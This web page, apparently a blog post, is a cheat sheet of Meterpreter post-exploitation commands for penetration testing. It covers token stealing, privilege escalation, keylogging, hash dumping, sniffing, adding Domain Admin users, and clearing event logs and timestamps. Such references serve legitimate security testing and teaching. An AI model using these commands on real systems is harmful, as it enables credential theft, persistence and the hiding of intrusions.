Here is a list with all the Meterpreter commands that can be used for post exploitation in a penetration testing.
help
Open Meterpreter usage help
run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
directory
sysinfo
Show the system information on the remote target
ls
List the files and folders on the target
use priv
Load the privilege extension for extended Meterpreter libraries
ps
Show all running processes and which accounts are associated with each process
migrate PID
Migrate to the specific process ID (PID is the target process ID gained
from the ps command)
use incognito
Load incognito functions. (Used for token stealing and impersonation on
a target machine)
list_tokens -u
List available tokens on the target by user
list_tokens -g
List available tokens on the target by group
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target
steal_token PID
Steal the tokens available for a given process and impersonate that token
drop_token
Stop impersonating the current token
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors
shell
Drop into an interactive shell with all available tokens
execute -f cmd.exe -i
Execute cmd.exe and interact with it
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process
rev2self
Revert back to the original user you used to compromise the target
reg command
Interact, create, delete, query, set, and much more in the target’s registry
setdesktop number
Switch to a different screen based on who is logged in
screenshot
Take a screenshot of the target’s screen
upload file
Upload a file to the target
download file
Download a file from the target
keyscan_start
Start sniffing keystrokes on the remote target
keyscan_dump
Dump the remote keys captured on the target
keyscan_stop
Stop sniffing keystrokes on the remote target
getprivs
Get as many privileges as possible on the target
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse
background
Run your current Meterpreter shell in the background
hashdump
Dump all hashes on the target
use sniffer
Load the sniffer module
sniffer_interfaces
List the available interfaces on the target
sniffer_dump interfaceID pcapname
Start sniffing on the remote target
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing
sniffer_stop interfaceID
Stop the sniffer
add_user username password -h ip
Add a user on the remote target
add_group_user “Domain Admins” username -h ip
Add a username to the Domain Administrators group on the remote target
clearev
Clear the event log on the target machine
timestomp
Change file attributes, such as creation date (antiforensics measure)
reboot
Reboot the target machine
1 Comment